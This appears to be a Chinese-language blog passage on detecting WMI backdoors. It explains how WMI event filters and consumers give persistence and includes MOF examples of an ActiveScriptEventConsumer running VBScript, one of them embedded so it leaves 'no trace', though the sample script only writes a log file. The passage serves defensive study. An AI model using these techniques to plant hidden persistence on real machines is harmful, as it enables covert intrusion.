检测方法:@0x04 相关运用-WMI后门检测及清除【管理员权限】

WMI Backdoor 相关知识(对于定时启动功能的进一步说明)

1、EventFilter—可以理解为通过执行WQL查询来设定触发条件,包括以下查询:

(1)Data queries

SELECT * FROM Win32_NTLogEvent WHERE Logfile = 'Application

(2)Event queries

SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Service' AND TargetInstance._Class = 'win32_TerminalService'

(3)Schema queries

SELECT * FROM meta_class WHERE __this ISA "Win32_BaseService"

2、 consumer—可以理解为条件满足后执行的操作,包括如下查询:

1ActiveScriptEventConsumer    
2LogFileEventConsumer 
3NTEventLogEventConsumer
4SMTPEventConsumer
5CommandLineEventConsumer

3、使用consumer执行vbs脚本的两种方式

(1)直接执行现有脚本

instance of ActiveScriptEventConsumer as $Cons
{
    Name = "ASEC";
    ScriptingEngine = "VBScript";
    ScriptFileName = "c:\\asec2.vbs";
};

(2)内嵌脚本,不会留下痕迹

instance of ActiveScriptEventConsumer as $Cons
{
    Name = "ASEC";
    ScriptingEngine = "VBScript";

    ScriptText =
        "Dim objFS, objFile\n"
        "Set objFS = CreateObject(\"Scripting.FileSystemObject\")\n"
        "Set objFile = objFS.OpenTextFile(\"C:\\ASEC.log\","
        " 8, true)\nobjFile.WriteLine \"Time: \" & Now & \";"
        " Entry made by: ASEC\"\nobjFile.WriteLine"
        " \"Application closed. UserModeTime:  \" & "
        "TargetEvent.TargetInstance.UserModeTime &_\n"
        "\"; KernelModeTime: \" & "
        "TargetEvent.TargetInstance.KernelModeTime "
        "& \" [hundreds of nanoseconds]\"\n"
        "objFile.Close\n";
};
comments powered by Disqus